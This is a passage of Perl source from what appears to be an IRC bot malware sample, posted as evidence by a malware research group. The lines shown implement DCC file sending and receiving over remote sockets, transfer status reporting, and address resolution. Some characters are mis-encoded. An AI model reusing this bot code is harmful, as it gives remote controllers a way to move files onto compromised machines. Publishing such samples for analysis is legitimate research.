809.   $DCC{$sendsock}{bytes} = $size_total;
810.   $DCC{$sendsock}{arquivo} = $arquivo;
811.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
812. }
813. sub GET {
814.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
815.   return(0) if (-e "$arquivo");
816.   if (open(FILE, "> $arquivo")) {
817.      close FILE;
818.   } else {
819.     return(0);
820.   }
821.   my $dccip=fixaddr($dcclongip);
822.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
823.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
824.   $dccsock->autoflush(1);
825.   $dcc_sel->add($dccsock);
826.   $DCC{$dccsock}{tipo} = 'get';
827.   $DCC{$dccsock}{itime} = time;
828.   $DCC{$dccsock}{nick} = $nick;
829.   $DCC{$dccsock}{bytes} = $bytes;
830.   $DCC{$dccsock}{curbyte} = 0;
831.   $DCC{$dccsock}{arquivo} = $arquivo;
832.   $DCC{$dccsock}{ip} = $dccip;
833.   $DCC{$dccsock}{porta} = $dccporta;
834.   $DCC{$dccsock}{status} = "Recebendo";
835. }
836. sub Status {
837.   my $socket = shift;
838.   my $sock_tipo = $DCC{$socket}{tipo};
839.   unless (lc($sock_tipo) eq "chat") {
840.     my $nick = $DCC{$socket}{nick};
841.     my $arquivo = $DCC{$socket}{arquivo};
842.     my $itime = $DCC{$socket}{itime};
843.     my $ftime = time;
844.     my $status = $DCC{$socket}{status};
845.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
846.  
847.     my $d_time = $ftime-$itime;
848.  
849.     my $cur_byte = $DCC{$socket}{curbyte};
850.     my $bytes_total =  $DCC{$socket}{bytes};
851.  
852.     my $rate = 0;
853.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
854.     my $porcen = ($cur_byte*100)/$bytes_total;
855.  
856.     my ($r_duv, $p_duv);
857.     if ($rate =‾ /^(¥d+)¥.(¥d)(¥d)(¥d)/) {
858.        $r_duv = $3; $r_duv++ if $4 >= 5;
859.        $rate = "$1¥.$2"."$r_duv";
860.     }
861.     if ($porcen =‾ /^(¥d+)¥.(¥d)(¥d)(¥d)/) {
862.        $p_duv = $3; $p_duv++ if $4 >= 5;
863.        $porcen = "$1¥.$2"."$p_duv";
864.     }
865.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
866.   }
867.   return(0);
868. }
869.  
870. sub fixaddr {
871.     my ($address) = @_;
872.  
873.     chomp $address;
874.     if ($address =‾ /^¥d+$/) {
875.         return inet_ntoa(pack "N", $address);
876.     } elsif ($address =‾ /^[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}$/) {
877.         return $address;
878.     } elsif ($address =‾ tr/a-zA-Z//) {
879.         return inet_ntoa(((gethostbyname($address))[4])[0]);
880.     } else {
881.         return;
882.     }
883. }
884.  
885. # ---- end of evidence----
886.  
887. #----
888. #MalwareMustDie
889. #"Thou Shalt not Hack"